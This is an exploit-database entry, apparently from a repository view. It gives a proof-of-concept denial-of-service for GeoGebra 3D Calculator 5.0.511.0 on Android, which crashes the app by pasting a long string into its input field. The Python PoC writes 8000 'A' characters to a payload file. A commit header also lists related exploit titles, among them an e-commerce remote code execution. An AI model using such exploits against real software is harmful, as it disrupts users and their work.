3e6d011cf0
6 changes to exploits/shellcodes GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC) Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)
28 lines
No EOL
909 B
Python
Executable file
28 lines
No EOL
909 B
Python
Executable file
# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
|
|
# Date: 2021-03-15
|
|
# Author: Brian Rodríguez
|
|
# Software Site: https://www.geogebra.org/download
|
|
# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
|
|
# Version: 5.0.511.0
|
|
# Category: DoS (Android)
|
|
|
|
##### Vulnerability #####
|
|
|
|
Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box.
|
|
|
|
Successful exploitation will causes application stop working.
|
|
|
|
I have been able to test this exploit against Android 10.0.
|
|
|
|
##### PoC #####
|
|
|
|
#!/usr/bin/env python
|
|
buffer = "\x41" * 8000
|
|
|
|
try:
|
|
f = open("payload.txt","w")
|
|
f.write(buffer)
|
|
f.close()
|
|
print ("File created")
|
|
except:
|
|
print ("File cannot be created") |